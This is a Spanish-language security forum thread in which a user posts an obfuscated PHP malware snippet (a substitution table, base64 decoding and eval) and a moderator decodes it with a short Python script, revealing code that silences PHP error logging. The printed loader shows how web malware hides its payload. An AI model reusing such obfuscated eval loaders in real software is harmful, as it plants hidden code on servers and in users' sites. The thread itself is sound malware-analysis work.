Código generado por malware

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

18 Abril 2024, 16:38 pm

Tema destacado: Trabajando con las ramas de git (tercera parte)

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

Código generado por malware

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: Código generado por malware (Leído 5,892 veces)

hecktor1

Desconectado

Desconectado

Mensajes: 1

Ver Perfil

Código generado por malware

« en: 5 Julio 2016, 00:28 am »

Alguien ha analizado este tipo de codigo, yo trate de decodificar la variable $lzyxbkb no obtuve ningun resultado. De antemano muchas gracias

Código:

<?php
$xinldc = 3029; function prvefyg($zjuwumi, $nntpi){$rpwdldofjl = ''; for($i=0; $i < strlen($zjuwumi); $i++){$rpwdldofjl .= isset($nntpi[$zjuwumi[$i]]) ? $nntpi[$zjuwumi[$i]] : $zjuwumi[$i];}
$oshju="base" . "64_decode";return $oshju($rpwdldofjl);}
$lzyxbkb = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki";

$zaeuth = Array('1'=>'a', '0'=>'n', '3'=>'b', '2'=>'S', '5'=>'o', '4'=>'7', '7'=>'4', '6'=>'M', '9'=>'q', '8'=>'w', 'A'=>'k', 'C'=>'s', 'B'=>'6', 'E'=>'d', 'D'=>'D', 'G'=>'L', 'F'=>'H', 'I'=>'C', 'H'=>'r', 'K'=>'U', 'J'=>'u', 'M'=>'i', 'L'=>'T', 'O'=>'y', 'N'=>'W', 'Q'=>'5', 'P'=>'I', 'S'=>'c', 'R'=>'E', 'U'=>'Y', 'T'=>'h', 'W'=>'e', 'V'=>'O', 'Y'=>'Z', 'X'=>'j', 'Z'=>'A', 'a'=>'2', 'c'=>'G', 'b'=>'m', 'e'=>'l', 'd'=>'R', 'g'=>'f', 'f'=>'p', 'i'=>'0', 'h'=>'x', 'k'=>'V', 'j'=>'1', 'm'=>'3', 'l'=>'P', 'o'=>'z', 'n'=>'8', 'q'=>'N', 'p'=>'Q', 's'=>'9', 'r'=>'v', 'u'=>'g', 't'=>'t', 'w'=>'X', 'v'=>'J', 'y'=>'F', 'x'=>'K', 'z'=>'B');
eval/*n*/(prvefyg($lzyxbkb, $zaeuth));?>


	En línea

MCKSys Argentina

Moderador Global

Desconectado

Desconectado

Mensajes: 5.470

Diviértete crackeando, que para eso estamos!

Ver Perfil

Re: Código generado por malware

« Respuesta #1 en: 5 Julio 2016, 01:36 am »

Si usas la table de conversión dada por $zaeuth, te queda que $lzyxbkb es un string en base64 que contiene:

Código

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set

No sé mucho de PHP, pero eso es lo que saco en claro.

Por las dudas, el script en python que usé para desofuscar el string:

Código

def main():
    alfa1 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    alfa2 = 'naSb7oM4wqk6sDdHLrCuUTiWyI5EchYOejZA2mGRlpfx01VP38zQNv9tgJXKFB'
    cad = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki'
    ret = ''
    for n in cad:
        ret += alfa2[alfa1.index(n)]
    print ret
 
 
if __name__ == '__main__':
    main()

Como ves, algo muy sencillo.

Saludos!


	En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

Reglas del foro - FAQ Ing. Inversa - Buscador del foro

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		Extrayendo código fuente de una web (Problema con código generado por JS) PHP	Littl3	4	7,795	3 Marzo 2011, 04:13 am por Nakp
		Codigo Java Script generado por php no funciona !!!!!! Desarrollo Web	Lupin	5	4,346	15 Abril 2011, 02:30 am por Lupin
		Problema con el molesto bloque de código generado en SharpDevelop .NET (C#, VB.NET, ASP)	aoeBoy	2	2,681	2 Abril 2012, 16:55 pm por aoeBoy
		(Consulta) Ensamblar código ASM (generado por g++ -S) usando g++ ASM	Seyro97	2	3,237	7 Octubre 2015, 20:50 pm por Seyro97
		MOVIDO: Código generado por malware Seguridad	MCKSys Argentina	0	1,797	5 Julio 2016, 02:00 am por MCKSys Argentina

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines